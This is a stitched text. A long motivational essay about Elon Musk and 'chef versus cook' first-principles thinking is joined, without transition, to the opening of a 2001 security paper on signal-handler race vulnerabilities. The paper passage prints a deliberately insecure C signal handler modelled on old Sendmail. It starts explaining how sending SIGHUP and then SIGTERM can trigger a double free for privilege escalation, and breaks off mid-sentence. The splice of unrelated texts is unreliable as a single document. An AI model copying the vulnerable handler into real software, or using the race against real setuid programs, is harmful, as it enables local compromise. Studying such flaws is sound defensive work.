History is full of the stories of chefs creating revolutions of apparent ingenuity through simple first principles reasoning. Genghis Khan organizing a smattering of tribes that had been fragmented for centuries using a powers of ten system in order to build one grand tribe that could sweep the world. Henry Ford creating cars with the out-of-the-box manufacturing technique of assembly-line production in order to bring cars to the masses for the first time. Marie Curie using unconventional methods to pioneer the theory of radioactivity and topple the “atoms are indivisible” assumption on its head (she won a Nobel Prize in both physics and chemistry—two prizes reserved exclusively for chefs). Martin Luther King taking a nonviolent Thoreau approach to a situation normally addressed by riots. Larry Page and Sergey Brin ignoring the commonly-used methods of searching the internet in favor of what they saw as a more logical system that based page importance on the number of important sites that linked to it. The 1966 Beatles deciding to stop being the world’s best cooks, ditching the typical songwriting styles of early-60s bands, including their own, and become music chefs, creating a bunch of new types of songs from scratch that no one had heard before.
Whatever the time, place, or industry, anytime something really big happens, there’s almost always an experimenting chef at the center of it—not being anything magical, just trusting their brain and working from scratch. Our world, like our cuisines, was created by these people—the rest of us are just along for the ride.
Yeah, Musk is smart as fuck and insanely ambitious—but that’s not why he’s beating us all. What makes Musk so rad is that he’s a software outlier. A chef in a world of cooks. A science geologist in a world of flood geologists. A brain software pro in a world where people don’t realize brain software is a thing.
That’s Elon Musk’s secret sauce.
Which is why the real story here isn’t Musk. It’s us.
The real puzzle in this series isn’t why Elon Musk is trying to end the era of gas cars or why he’s trying to land a rocket or why he cares so much about colonizing Mars—it’s why Elon Musk is so rare.
The curious thing about the car industry isn’t why Tesla is focusing so hard on electric cars, and the curious thing about the aerospace industry isn’t why SpaceX is trying so hard to make rockets reusable—the fascinating question is why they’re the only companies doing so.
We spent this whole time trying to figure out the mysterious workings of the mind of a madman genius only to realize that Musk’s secret sauce is that he’s the only one being normal. And in isolation, Musk would be a pretty boring subject—it’s the backdrop of us that makes him interesting. And it’s that backdrop that this series is really about.
So…what’s the deal with us? How did we end up so scared and cook-like? And how do we learn to be more like the chefs of the world, who seem to so effortlessly carve their own way through life? I think it comes down to three things.
How to Be a Chef
Anytime there’s a curious phenomenon within humanity—some collective insanity we’re all suffering from—it usually ends up being evolution’s fault. This story is no different.
When it comes to reasoning, we’re biologically inclined to be cooks, not chefs, which relates back to our tribal evolutionary past. First, it’s a better tribal model for most people to be cooks. In 50,000 BC, tribes full of independent thinkers probably suffered from having too many chefs in the kitchen, which would lead to too many arguments and factions within the tribe. A tribe with a strong leader at the top and the rest of the members simply following the leader would fare better. So those types of tribes passed on their genes more. And now we’re the collective descendants of the more cook-like people.
Second, it’s about our own well-being. It’s not in our DNA to be chefs because human self-preservation never depended upon independent thinking—it rode on fitting in with the tribe, on staying in favor with the chief, on following in the footsteps of the elders who knew more about staying alive than we did. And on teaching our children to do the same—which is why we now live in a cook society where cook parents raise their kids by telling them to follow the recipe and stop asking questions about it.
Thinking like cooks is what we’re born to do because what we’re born to do is survive.
But the weird thing is, we weren’t born into a normal human world. We’re living in the anomaly, when for many of the world’s people, survival is easy. Today’s privileged societies are full of anomaly humans whose primary purpose is already taken care of, softening the deafening roar of unmet base needs and allowing the nuanced and complex voice of our inner selves to awaken.
The problem is, most of our heads are still running on some version of the 50,000-year-old survival software—which kind of wastes the good luck we have to be born now.
It’s an unfortunate catch-22—we continue to think like cooks because we can’t absorb the epiphany that we live in an anomaly world where there’s no need to be cooks, and we can’t absorb that epiphany because we think like cooks and cooks don’t know how to challenge and update their own software.
This is the vicious cycle of our time—and the secret of the chef is that they somehow snapped out of it.
So how do we snap out of the trance?
I think there are three major epiphanies we need to absorb—three core things the chef knows that the cook doesn’t:
Epiphany 1) You don’t know shit.
You don't know shit
The flood geologists of the 17th and 18th centuries weren’t stupid. And they weren’t anti-science. Many of them were just as accomplished in their fields as their science geologist colleagues.
But they were victims—victims of a religious dogma they were told to believe without question. The recipe they followed was scripture, a recipe that turned out to be wrong. And as a result, they proceeded on their path with a fatal flaw in their thinking—a software bug that told them that one of the undeniable first principles when thinking about the Earth was that it began 6,000 years ago and that there had been a flood of the most epic proportions.
With that bug in place, all further computations were moot. Any reasoning tree that puzzled upwards with those assumptions at its root had no chance of finding truth.
Even more than being victims of any dogma, the flood geologists were victims of their own certainty. Without certainty, dogma has no power. And when data is required in order to believe something, false dogma has no legs to stand on. It wasn’t the church dogma that hindered the flood geologists, it was the church mentality of faith-based certainty.
That’s what Stephen Hawking meant when he said, “The greatest enemy of knowledge is not ignorance, it is the illusion of knowledge.” Neither the science geologist nor the flood geologist started off with knowledge. But what gave the science geologist the power to seek out the truth was knowing that he had no knowledge. The science geologists subscribed to the lab mentality, which starts by saying “I don’t know shit” and works upwards from there.
If you want to see the lab mentality at work, just search for famous quotes of any prominent scientist and you’ll see each one of them expressing the fact that they don’t know shit.
Here’s Isaac Newton: To myself I am only a child playing on the beach, while vast oceans of truth lie undiscovered before me.
And Richard Feynman: I was born not knowing and have had only a little time to change that here and there.
And Niels Bohr: Every sentence I utter must be understood not as an affirmation, but as a question.
Musk has said his own version: You should take the approach that you’re wrong. Your goal is to be less wrong.9
The reason these outrageously smart people are so humble about what they know is that as scientists, they’re aware that unjustified certainty is the bane of understanding and the death of effective reasoning. They firmly believe that reasoning of all kinds should take place in a lab, not a church.
If we want to become more chef-like, we have to make sure we’re doing our thinking in a lab. Which means identifying which parts of our thinking are currently sitting in church.
But that’s a hard thing to do because most of us have the same relationship with our own software that my grandmother has with her computer:9 It’s this thing someone put there, we use it when we need to, it somehow magically works, and we hope it doesn’t break. It’s the way we are with a lot of the things we own, where we’re just the dumb user, not the pro. We know how to use our car, microwave, phone, our electric toothbrush, but if something breaks, we take it to the pro to fix it because we have no idea how it works.
But that’s not a great life model when it comes to brain software, and it usually leads to us making the same mistakes and living with the same results year after year after year, because our software remains unchanged. Eventually, we might wake up one day feeling like Breaking Bad’s Walter White, when he said, “Sometimes I feel like I never actually make, any of my own… choices. I mean, my entire life it just seems I never… had a real say about any of it.” If we want to understand our own thinking, we have to stop being the dumb user of our own software and start being the pro—the auto mechanic, the electrician, the computer geek.
If you were alone in a room with a car and wanted to figure out how it worked, you’d probably start by taking it apart as much as you could and examining the parts and how they all fit together. To do the same with our thinking, we need to revert to our four-year-old selves and start deconstructing our software by resuming the Why game our parents and teachers shut down decades ago. It’s time to roll up our sleeves, pop open the hood, and get our hands dirty with a bunch of not-that-fun questions about what we truly want, what’s truly possible, and whether the way we’re living our lives follows logically from those things.
With each of these questions, the challenge is to keep asking why until you hit the floor—and the floor is what will tell you whether you’re in a church or a lab for that particular part of your life. If a floor you hit is one or more first principles that represent the truth of reality or your inner self and the logic going upwards stays accurate to that foundation, you’re in the lab. If a Why? pathway hits a floor called “Because [authority] said so”—if you go down and down and realize at the bottom that the whole thing is just because you’re taking your parent’s or friend’s or religion’s or society’s word for it—then you’re in church there. And if the tenets of that church don’t truly resonate with you or reflect the current reality of the world—if it turns out that you’ve been working off of the wrong recipe—then whatever conclusions have been built on top of it will be just as wrong. As demonstrated by the flood geologists, a reasoning chain is only as strong as its weakest link.
False Dogma 1
Astronomers once hit a similar wall in their progress trying to calculate the trajectories of the sun and planets in the Solar System. Then one day they discovered that the sun was at the center of things, not the Earth, and suddenly, all the perplexing calculations made sense, and progress leapt forward. Had they played the Why game earlier, they’d have run into a dogmatic floor right after the question “But why do we know that the Earth is in the center of everything?”
People’s lives are no different, which is why it’s so important to find the toxic lumps of false dogma tucked inside the layers of your reasoning software. Identifying one and adjusting it can strengthen the whole chain above and create a breakthrough in your life.
False Dogma 2
The thing you really want to look closely for is unjustified certainty. Where in life do you feel so right about something that it doesn’t qualify as a hypothesis or even a theory, but it feels like a proof? When there’s proof-level certainty, it means either there’s some serious concrete and verified data underneath it—or it’s faith-based dogma. Maybe you feel certain that quitting your job would be a disaster or certain that there’s no god or certain that it’s important to go to college or certain that you’ve always had a great time on rugged vacations or certain that everyone loves it when you break out the guitar during a group hangout—but if it’s not well backed-up by data from what you’ve learned and experienced, it’s at best a hypothesis and at worst a completely false piece of dogma.
And if thinking about all of that ends with you drowning in some combination of self-doubt, self-loathing, and identity crisis, that’s perfect. This first epiphany is about humility. Humility is by definition a starting point—and it sends you off on a journey from there. The arrogance of certainty is both a starting point and an ending point—no journeys needed. That’s why it’s so important that we begin with “I don’t know shit.” That’s when we know we’re in the lab.
Epiphany 2) No one else knows shit either.
No one else knows shit
Let me illustrate a little story for you.
Emperor 1Emperor 2Emperor 3Emperor 4
Emperor 5Emperor 6
Emperor 7Emperor 8Emperor 9Emperor 10Emperor 11Emperor 12Emperor 13
Emperor 13aEmperor 14Emperor 15Emperor 16Emperor 17Emperor 18
Yes, it’s an old classic. The Emperor’s New Clothes. It was written in 1837 by Hans Christian Andersen10 to demonstrate a piece of trademark human insanity: the “This doesn’t seem right to me but everyone else says it’s right so it must be right and I’ll just pretend I also think it’s right so no one realizes I’m stupid” phenomenon.
My favorite all-time quote might be Steve Jobs saying this:
When you grow up, you tend to get told the world is the way it is and your life is just to live your life inside the world. Try not to bash into the walls too much. Try to have a nice family life, have fun, save a little money. That’s a very limited life. Life can be much broader once you discover one simple fact. And that is: Everything around you that you call life was made up by people that were no smarter than you. And you can change it, you can influence it, you can build your own things that other people can use. Once you learn that, you’ll never be the same again.11
This is Jobs’ way of saying, “You might not know shit. But no one knows shit. If the emperor looks naked to you and everyone else is saying he has clothes, trust your eyes since other people don’t know anything you don’t.”
It’s an easy message to understand, a harder one to believe, and an even harder one to act on.
The purpose of the first epiphany is to shatter the belief that all that dogma you’ve memorized constitutes personal opinions and wisdom and all that certainty you feel constitutes knowledge and understanding. That’s the easier one because the delusion that we know what we’re talking about is pretty fragile, with the “Oh god I’m a fraud who doesn’t know shit” monster never lurking too far under our consciousness.
But this epiphany—that the collective “other people” and their conventional wisdom don’t know shit—is a much larger challenge. Our delusion about the wisdom of those around us, our tribe, and society as a whole is much thicker and runs much deeper than the delusion about ourselves. So deep that we’ll see a naked emperor and ignore our own eyes if everyone else says he has clothes on.
This is a battle of two kinds of confidence—confidence in others vs. confidence in ourselves. For most cooks, confidence in others usually comes out the winner.
To swing the balance, we need to figure out how to lose respect for the general public, your tribe’s dogma, and society’s conventional wisdom. We have a bunch of romantic words for the world’s chefs that sound impressive but are actually just a result of them having lost this respect. Being a gamechanger is just having little enough respect for the game that you realize there’s no good reason not to change the rules. Being a trailblazer is just not respecting the beaten path and so deciding to blaze yourself a new one. Being a groundbreaker is just knowing that the ground wasn’t laid by anyone that impressive and so feeling no need to keep it intact.
Not respecting society is totally counterintuitive to what we’re taught when we grow up—but it makes perfect sense if you just look at what your eyes and experience tell you.
There are clues all around showing us that conventional wisdom doesn’t know shit. Conventional wisdom worships the status quo and always assumes that everything is the way it is for a good reason—and history is one long record of status quo dogma being proven wrong again and again, every time some chef comes around and changes things.
And if you open your eyes, there are other clues all through your own life that the society you live in is nothing to be intimidated by. All the times you learn about what really goes on inside a company and find out that it’s totally disorganized and badly run. All the people in high places who can’t seem to get their personal lives together. All the well-known sitcoms whose jokes you’re pretty sure you could have written when you were 14. All the politicians who don’t seem to know more about the world than you.
And yet, the delusion that society knows shit that you don’t runs deep, and still, somewhere in the back of your head, you don’t think it’s realistic that you could ever actually build that company, achieve that fabulous wealth or celebrity-status, create that TV show, win that senate campaign—no matter what it seems like.
Sometimes it takes an actual experience to fully expose society for the shit it doesn’t know. One example from my life is how I slowly came to understand that most Americans—the broader public, my tribe, and people I know well—knew very little about what it’s actually like to visit most countries. I grew up hearing about how dangerous it was to visit really foreign places, especially alone. But when I started going places I wasn’t supposed to go, I kept finding that the conventional wisdom had been plain wrong about it. As I had more experiences and gathered more actual data, I grew increasingly trusting of my own reasoning over whatever Americans were saying. And as my confidence grew, places like Thailand and Spain turned into places like Oman and Uzbekistan which turned into places like Nigeria and North Korea. When it comes to traveling, I had the epiphany: other people’s strong opinions about this are based on unbacked-up dogma and the fact that most people I talk to feel the same way means nothing if my own research, experience, and selective question-asking brings me to a different conclusion.12 When it comes to picking travel destinations, I’ve become a chef.
I try to leverage what I learned as a traveler to transfer the chefness elsewhere—when I find myself discouraged in another part of my life by the warnings and head-shaking of conventional wisdom, I try to remind myself: “These are the same people that were sure that North Korea was dangerous.” It’s hard—you have to take the leap to chefdom separately in each part of your life—but it seems like with each successive cook → chef breakthrough, future breakthroughs become easier to come by. Eventually, you must hit a tipping point and trusting your own software becomes your way of life—and as Jobs says, you’ll never be the same again.
The first epiphany was about shattering a protective shell of arrogance to lay bare a starting point of humility. This second epiphany is about confidence—the confidence to emerge from that humility through a pathway built on first principles instead of by analogy. It’s a confidence that says, “I may not know much, but no one else does either, so I might as well be the most knowledgeable person on Earth.”
Epiphany 3) You’re playing Grand Theft Life
Grand Theft Life
The first two epiphanies allow us to break open our software, identify which parts of it were put there by someone else, and with confidence begin to fill in the Want and Reality boxes with our own handwriting and choose a goal and a strategy that’s right for us.
But then we hit a snag. We’re finally in the lab with all our tools and equipment, but something holds us back. To figure out why, let’s bring back our emperor story.
When the emperor struts out with his shoulder hair and his gut and his little white junk, the story only identifies two kinds of people: the mass of subjects, who all pretend they can see the clothes, and the kid, who just says that the dude is obviously naked.
But I think there’s more going on. In an emperor’s new clothes situation, there are four kinds of people:
1) Proud Cook. Proud Cook is the person drinking the full dogma Kool-Aid. Whatever independent-thinking voice is inside of Proud Cook was silenced long ago, and there’s no distinction between his thoughts and the dogma he follows. As far as he’s concerned, the dogma is truth—but since he doesn’t even register that there’s any dogma happening, Proud Cook simply thinks he’s a very wise person who has it all figured out. He feels the certainty of the dogma running through his veins. When the emperor walks out and proclaims that he is wearing beautiful new clothes, Proud Cook actually sees clothes, because his consciousness isn’t even turned on.
2) Insecure Cook. Insecure Cook is what Proud Cook turns into after undergoing Epiphany #1. Insecure Cook has had a splash of self-awareness—enough to become conscious of the fact that he doesn’t actually know why he’s so certain about the things he’s certain about. Whatever the reasons are, he’s sure they’re right, but he can’t seem to come up with them himself. Without the blissful arrogance of Proud Cook, Insecure Cook is lost in the world, wondering why he’s too dumb to get what everyone else gets and trying to watch others to figure out what he’s supposed to do—all while hoping nobody finds out that he doesn’t get it. When Insecure Cook sees the emperor, his heart sinks—he doesn’t see the clothes, only the straggly gray hears of the emperor’s upper thighs. Ashamed, he reads the crowd and mimics their enthusiasm for the clothes.
3) Self-Loathing Cook. Self-Loathing Cook is what Insecure Cook becomes after being hit by Epiphany #2. Epiphany #2 is the forbidden fruit, and Self-Loathing Cook has bitten it. He now knows exactly why he didn’t feel certain about everything—because it was all bullshit. He sees the tenets of conventional wisdom for what they really are—faith-based dogma. He knows that neither he nor anyone else knows shit and that he’ll get much farther riding his own reasoning than jumping on the bandwagon with the masses. When the emperor emerges, Self-Loathing Cook thinks, “Oh Jesus…this fucktard is actually outside with no clothes on. Oh—oh and my god these idiots are all pretending to see clothes. How is this my life? I need to move.”
But then, right when he’s about to call everyone out on their pretending and the emperor out on his bizarre life decision, there’s a lump in his throat. Sure, he knows there are no clothes on that emperor’s sweaty lower back fat roll—but actually saying that? Out loud? I mean, he’s sure and all—but let’s not go crazy here. Better not to call too much attention to himself. And of course, there’s a chance he’s missing something. Right?
Self-Loathing Cook ends up staying quiet and nodding at the other cooks when they ask him if those clothes aren’t just the most marvelous he’s ever seen.
4) The chef. The kid in the story. The chef is Self-Loathing Cook—except without the irrational fear. The chef goes through the same inner thought process as Self-Loathing Cook, but when it’s time to walk the walk, the chef stands up and yells out the truth.
A visual recap:
4 Subjects
We’re all human and we’re all complex, which means that in various parts of each of our lives, we play each of these four characters.
But to me, Self-Loathing Cook is the most curious one of the four. Self-Loathing Cook gets it. He knows what the chefs know. He’s tantalizingly close to carving out his own chef path in the world, and he knows that if he just goes for it, good things would happen. But he can’t pull the trigger. He built himself a pair of wings he feels confident work just fine, but he can’t bring himself to jump off the cliff.
And as he stands there next to the cliff with the other cooks, he has to endure the torture of watching the chefs of the world leap off the edge with the same exact wings and flying skills he has, but with the courage he can’t seem to find.
To figure out what’s going on with Self-Loathing Cook, let’s remind ourselves how the chefs operate.
Free of Self-Loathing Cook’s trepidation, the world’s chefs are liberated to put on their lab coats and start sciencing. To a chef, the world is one giant laboratory, and their life is one long lab session full of a million experiments. They spend their days puzzling, and society is their game board.
The chef treats his goals and undertakings as experiments whose purpose is as much to learn new information as it is to be ends in themselves. That’s why when I asked Musk what his thoughts were on negative feedback, he answered with this:
I’m a huge believer in taking feedback. I’m trying to create a mental model that’s accurate, and if I have a wrong view on something, or if there’s a nuanced improvement that can be made, I’ll say, “I used to think this one thing that turned out to be wrong—now thank goodness I don’t have that wrong belief.”
To a chef in the lab, negative feedback is a free boost forward in progress, courtesy of someone else. Pure upside.
As for the F word…the word that makes our amygdalae quiver in the moonlight, the great chefs have something to say about that too:
Failure is simply the opportunity to begin again, this time more intelligently. —Henry Ford
Success is going from failure to failure without losing your enthusiasm. —Winston Churchill10
I have not failed 700 times. I’ve succeeded in proving 700 ways how not to build a lightbulb. —Thomas Edison
There’s no more reliable corollary than super-successful people thinking failure is fucking awesome.
But there’s something to that. The science approach is all about learning through testing hypotheses, and hypotheses are built to be disproven, which means that scientists learn through failure. Failure is a critical part of their process.
It makes sense. If there were two scientists trying to come up with a breakthrough in cancer treatment, and the first one is trying every bold thing he can imagine, failing left and right and learning something each time, while the second one is determined not to have any failures so is making sure his experiments are similar to others that have already been proven to work—which scientist would you bet on?
It’s not surprising that so many of the most wildly impactful people seem to treat the world like a lab and their life like an experiment session—that’s the best way to succeed at something.
But for most of us, we just can’t do it. Even poor Self-Loathing Cook, who is so damn close to being a chef—but somehow so far away.
So what’s stopping him? I think two major misconceptions:
Misconception 1: Misplaced Fear
We talked about the chef’s courage actually just being an accurate assessment of risk—and that’s one of the major things Self-Loathing Cook is missing. He thinks he has become wise to the farce of letting dogma dictate your life, but he’s actually in the grasp of dogma’s slickest trick.
Humans are programmed to take potential fear very seriously, and evolution didn’t find it efficient to have us assess and re-assess every fear inside of us. It went instead with the “better safe than sorry” philosophy—i.e. if there’s a chance that a certain fear might be based on real danger, file it away as a real fear, just in case, and even if you confirm later that a fear of yours has no basis, keep it with you, just in case. Better safe than sorry.
And the fear file cabinet is somewhere way down in our psyches—somewhere far below our centers of rationality, out of reach.
The purpose of all of that fear is to make us protect ourselves from danger. The problem for us is that as far as evolution is concerned, danger = something that hurts the chance that your genes will move on—i.e., danger = not mating or dying or your kids dying, and that’s about it.
So in the same way our cook-like qualities were custom-built for survival in tribal times, our obsession with fears of all shapes and sizes may have served us well in Ethiopia 50,000 years ago—but it mostly ruins our lives today.
Because not only does it amp up our fear in general to “shit we botched the hunt now the babies are all going to starve to death this winter” levels even though we live in an “oh no I got laid off now I have to sleep at my parents’ house for two months with a feather pillow in ideal 68º temperature” world—but it also programs us to be terrified of all the wrong things. We’re more afraid of public speaking than texting on the highway, more afraid of approaching an attractive stranger in a bar than marrying the wrong person, more afraid of not being able to afford the same lifestyle as our friends than spending 50 years in meaningless career—all because embarrassment, rejection, and not fitting in really sucked for hunters and gatherers.
This leaves most of us with a skewed danger scale:
Danger Scale
Chefs hate real risk just as much as cooks—a chef that ends up in the Actually Dangerous territory and ends up in jail or in a gutter or in dire financial straits isn’t a chef—he’s a cook living under “I’m invincible” dogma. When we see chefs displaying what looks like incredible courage, they’re usually just in the the Chef Lab. The Chef Lab is where all the action is and where the path to many people’s dreams lies—dreams about their career, about love, about adventure. But even though its doors are always open, most people never set foot in it for the same reason so many Americans never visit some of the world’s most interesting countries—because of an incorrect assumption that it’s a dangerous place. By reasoning by analogy when it comes to what constitutes danger and ending up with a misconception, Self-Loathing Cook is missing out on all the fun.
Misconception 2: Misplaced Identity
The second major problem for Self-Loathing Cook is that, like all cooks, he can’t wrap his head around the fact that he’s the scientist in the lab—not the experiment.
As we established earlier, conscious tribe members reach conclusions, while blind tribe members are conclusions. And what you believe, what you stand for, and what you choose to do each day are conclusions that you’ve drawn. In some cases, very, very publicly.
As far as society is concerned, when you give something a try—on the values front, the fashion front, the religious front, the career front—you’ve branded yourself. And since people like to simplify people in order to make sense of things in their own head, the tribe around you reinforces your brand by putting you in a clearly-labeled, oversimplified box.
What this all amounts to is that it becomes very painful to change. Changing is icky for someone whose identity will have to change along with it. And others don’t make things any easier. Blind tribe members don’t like when other tribe members change—it confuses them, it forces them to readjust the info in their heads, and it threatens the simplicity of their tribal certainty. So attempts to evolve are often met with mockery or anger or opposition.
And when you have a hard time changing, you become attached to who you currently are and what you’re currently doing—so attached that it blurs the distinction between the scientist and the experiment and you forget that they’re two different things.
We talked about why scientists welcome negative feedback about their experiments. But when you are the experiment, negative feedback isn’t a piece of new, helpful information—it’s an insult. And it hurts. And it makes you mad. And because changing feels impossible, there’s not much good that feedback can do anyway—it’s like giving parents negative feedback on the name of their one-month-old child.
We discussed why scientists expect plenty of their experiments to fail. But when you and the experiment are one and the same, not only is taking on a new goal a change of identity, it’s putting your identity on the line. If the experiment fails, you fail. You are a failure. Devastating. Forever.
I talked to Musk about the United States and the way the forefathers reasoned by first principles when they started the country. He said he thought the reason they could do so is that they had a fresh slate to work with. The European countries of that era would have had a much harder time trying to do something like that—because, as he told me, they were “trapped in their own history.”
I’ve heard Musk use this same phrase to describe the big auto and aerospace companies of today. He sees Tesla and SpaceX like the late 18th century USA—fresh new labs ready for experiments—but when he looks at other companies in their industries, he sees an inability to drive their strategies from a clean slate mentality. Referring to the aerospace industry, Musk said, “There’s a tremendous bias against taking risks. Everyone is trying to optimize their ass-covering.”
Being trapped in your history means you don’t know how to change, you’ve forgotten how to innovate, and you’re stuck in the identity box the world has put you in. And you end up being the cancer researcher we mentioned who only tries likely-to-succeed experimentation within the comfort zone he knows best.
It’s for this reason that Steve Jobs looks back on his firing from Apple in 1986 as a blessing in disguise. He said: “Getting fired from Apple was the best thing that could have ever happened to me. The heaviness of being successful was replaced by the lightness of being a beginner again. It freed me to enter one of the most creative periods of my life.” Being fired “freed” Jobs from the shackles of his own history.
So what Self-Loathing Cook has to ask himself is: “Am I trapped in my own history?” As he stands on the cliff with his wings ready for action and finds himself paralyzed—from evolving as a person, from making changes in his life, from trying to do something bold or unusual—is the baggage of his own identity part of what’s holding him back?
Self-Loathing Cook’s beliefs about what’s scary aren’t any more real than Insecure Cook’s assumption that conventional wisdom has all the answers—but unlike the “Other people don’t know shit” epiphany, which you can observe evidence of all over the place, the epiphany that neither failing nor changing is actually a big deal can only be observed by experiencing it for yourself. Which you can only do after you overcome those fears…which only happens if you experience changing and failing and realize that nothing bad happens. Another catch-22.
These are the reasons I believe so many of the world’s most able people are stuck in life as Self-Loathing Cook, one epiphany short of the promised land.
The challenge with this last epiphany is to somehow figure out a way to lose respect for your own fear. That respect is in our wiring, and the only way to weaken it is by defying it and seeing, when nothing bad ends up happening, that most of the fear you’ve been feeling has just been a smoke and mirrors act. Doing something out of your comfort zone and having it turn out okay is an incredibly powerful experience, one that changes you—and each time you have that kind of experience, it chips away at your respect for your brain’s ingrained, irrational fears.
Because the most important thing the chef knows that the cooks don’t is that real life and Grand Theft Auto aren’t actually that different. Grand Theft Auto is a fun video game because it’s a fake world where you can do things with no fear. Drive 200mph on the highway. Break into a building. Run over a prostitute with your car. All good in GTA.
Unlike GTA, in real life, the law is a thing and jail is a thing. But that’s about where the differences end. If someone gave you a perfect simulation of today’s world to play in and told you that it’s all fake with no actual consequences—with the only rules being that you can’t break the law or harm anyone, and you still have to make sure to support your and your family’s basic needs—what would you do? My guess is that most people would do all kinds of things they’d love to do in their real life but wouldn’t dare to try, and that by behaving that way, they’d end up quickly getting a life going in the simulation that’s both far more successful and much truer to themselves than the real life they’re currently living. Removing the fear and the concern with identity or the opinions of others would thrust the person into the not-actually-risky Chef Lab and have them bouncing around all the exhilarating places outside their comfort zone—and their lives would take off. That’s the life irrational fears block us from.
When I look at the amazing chefs of our time, what’s clear is that they’re more or less treating real life as if it’s Grand Theft Life. And doing so gives them superpowers. That’s what I think Steve Jobs meant all the times he said, “Stay hungry. Stay foolish.”
And that’s what this third epiphany is about: fearlessness.
So if we want to think like a scientist more often in life, those are the three key objectives—to be humbler about what we know, more confident about what’s possible, and less afraid of things that don’t matter.
It’s a good plan—but also, ugh. Right? That’s a lot of stuff to try to do.
Usually at the end of a post like this, the major point seems manageable and concrete, and I finish writing it all excited to go be good at shit. But this post was like, “Here’s everything important and go do it.” So how do we work with that?
I think the key is to not try to be a perfect chef or expect that of yourself whatsoever. Because no one’s a perfect chef—not even Elon. And no one’s a pure cook either—nothing’s black and white when you’re talking about an animal species whose brains contain 86 billion neurons. The reality is that we’re all a little of both, and where we are on that spectrum varies in 100 ways, depending on the part of life in question, the stage we’re in of our evolution, and our mood that day.
If we want to improve ourselves and move our way closer to the chef side of the spectrum, we have to remember to remember. We have to remember that we have software, not just hardware. We have to remember that reasoning is a skill and like any skill, you get better at it if you work on it. And we have to remember the cook/chef distinction, so we can notice when we’re being like one or the other.
It’s fitting that this blog is called Wait But Why because the whole thing is a little like the adult version of the Why? game. After emerging from the blur of the arrogance of my early twenties, I began to realize that my software was full of a lot of unfounded certainty and blind assumptions and that I needed to spend some serious time deconstructing—which is the reason that every Wait But Why post, no matter what the topic, tends to start off with the question, “What’s really going on here?”
For me, that question is the springboard into all of this remembering to remember—it’s a hammer that shatters a brittle, protective feeling of certainty and forces me to do the hard work of building a more authentic, more useful set of thoughts about something. Or at least a better-embraced bewilderment.
And when I started learning about Musk in preparation to write these posts, it hit me that he wasn’t just doing awesome things in the world—he was a master at looking at the world, asking “What’s really going on here?” and seeing the real answer. That’s why his story resonated so hard with me and why I dedicated so much Wait But Why time to this series.
But also, Mars. Let’s all go, okay?
"Delivering Signals for Fun and Profit"
Understanding, exploiting and preventing signal-handling
related vulnerabilities.
Michal Zalewski <lcamtuf@razor.bindview.com>
(C) Copyright 2001 BindView Corporation
According to a popular belief, writing signal handlers has little or nothing
to do with secure programming, as long as handler code itself looks good.
At the same time, there have been discussions on functions that shall be
invoked from handlers, and functions that shall never, ever be used there.
Most Unix systems provide a standarized set of signal-safe library calls.
Few systems have extensive documentation of signal-safe calls - that includes
OpenBSD, Solaris, etc.:
http://www.openbsd.org/cgi-bin/man.cgi?query=sigaction:
"The following functions are either reentrant or not interruptible by sig-
nals and are async-signal safe. Therefore applications may invoke them,
without restriction, from signal-catching functions:
_exit(2), access(2), alarm(3), cfgetispeed(3), cfgetospeed(3),
cfsetispeed(3), cfsetospeed(3), chdir(2), chmod(2), chown(2),
close(2), creat(2), dup(2), dup2(2), execle(2), execve(2),
fcntl(2), fork(2), fpathconf(2), fstat(2), fsync(2), getegid(2),
geteuid(2), getgid(2), getgroups(2), getpgrp(2), getpid(2),
getppid(2), getuid(2), kill(2), link(2), lseek(2), mkdir(2),
mkfifo(2), open(2), pathconf(2), pause(2), pipe(2), raise(3),
read(2), rename(2), rmdir(2), setgid(2), setpgid(2), setsid(2),
setuid(2), sigaction(2), sigaddset(3), sigdelset(3),
sigemptyset(3), sigfillset(3), sigismember(3), signal(3),
sigpending(2), sigprocmask(2), sigsuspend(2), sleep(3), stat(2),
sysconf(3), tcdrain(3), tcflow(3), tcflush(3), tcgetattr(3),
tcgetpgrp(3), tcsendbreak(3), tcsetattr(3), tcsetpgrp(3), time(3),
times(3), umask(2), uname(3), unlink(2), utime(3), wait(2),
waitpid(2), write(2). sigpause(3), sigset(3).
All functions not in the above list are considered to be unsafe with re-
spect to signals. That is to say, the behaviour of such functions when
called from a signal handler is undefined. In general though, signal
handlers should do little more than set a flag; most other actions are
not safe."
It is suggested to take special care when performing any non-atomic
operations while signal delivery is not blocked, and/or not to rely on
internal program state in signal handler. Generally, signal handlers should
do not much more than setting a flag, whenever it is acceptable.
Unfortunately, there were no known, practical security considerations of
such bad coding practices. And while signal can be delivered anywhere
during the userspace execution of given program, most of programmers never
take enough care to avoid potential implications caused by this fact.
Approximately 80 to 90% of signal handlers we have examined were written
in insecure manner.
This paper is an attempt to demonstrate and analyze actual risks caused by
this kind of coding practices, and to discuss threat scenarios that can be
used by an attacker in order to escalate local privileges, or, sometimes,
gain remote access to a machine. This class of vulnerabilities affects
numerous complex setuid programs (Sendmail, screen, pppd, etc.) and
several network daemons (ftpd, httpd and so on).
Thanks to Theo de Raadt for bringing this problem to my attention;
to Przemyslaw Frasunek for remote attack possibilities discussion; Dvorak,
Chris Evans and Pekka Savola for outstanding contribution to heap corruption
attacks field; Gregory Neil Shapiro and Solar Designer for their comments
on the issues discussed below. Additional thanks to Mark Loveless,
Dave Mann, Matt Power and other RAZOR team members for their support and
reviews.
Before we discuss more generalized attack scenarios, I would like to explain
signal handler races starting with very simple and clean example. We would
try to exploit non-atomic signal handler. The following code generalizes, in
simplified way, very common bad coding practice (which is present, for
example, in setuid root Sendmail program up to 8.11.3 and 8.12.0.Beta7):
/*****
void sighndlr(int dummy) {
syslog(LOG_NOTICE,user_dependent_data);
// Initial cleanup code, calling the following somewhere:
free(global_ptr2);
free(global_ptr1);
// 1 *** >> Additional clean-up code - unlink tmp files, etc <<
exit(0);
}
/**
at the beginning of main code. *
**/
signal(SIGHUP,sighndlr);
signal(SIGTERM,sighndlr);
// Other initialization routines, and global pointer
// assignment somewhere in the code (we assume that
// *** nnn is partially user-dependent, yyy does not have to be):
global_ptr1=malloc(nnn);
global_ptr2=malloc(yyy);
// 2 >> further processing, allocated memory <<
// 2 >> is filled with any data, etc... <<
This code seems to be pretty immune to any kind of security compromises. But
this is just an illusion. By delivering one of the signals handled by
sighndlr() function somewhere in the middle of main code execution (marked
as ' 2 ' in above example) code execution would reach handler function.
Let's assume we delivered SIGHUP. Syslog message is written, two pointers are
freed, and some more clean-up is done before exiting ( 1 ).
Now, by quickly delivering another signal - SIGTERM (note that already
delivered signal is masked and would be not delivered, so you cannot
deliver SIGHUP, but there is absolutely nothing against delivering SIGTERM) -
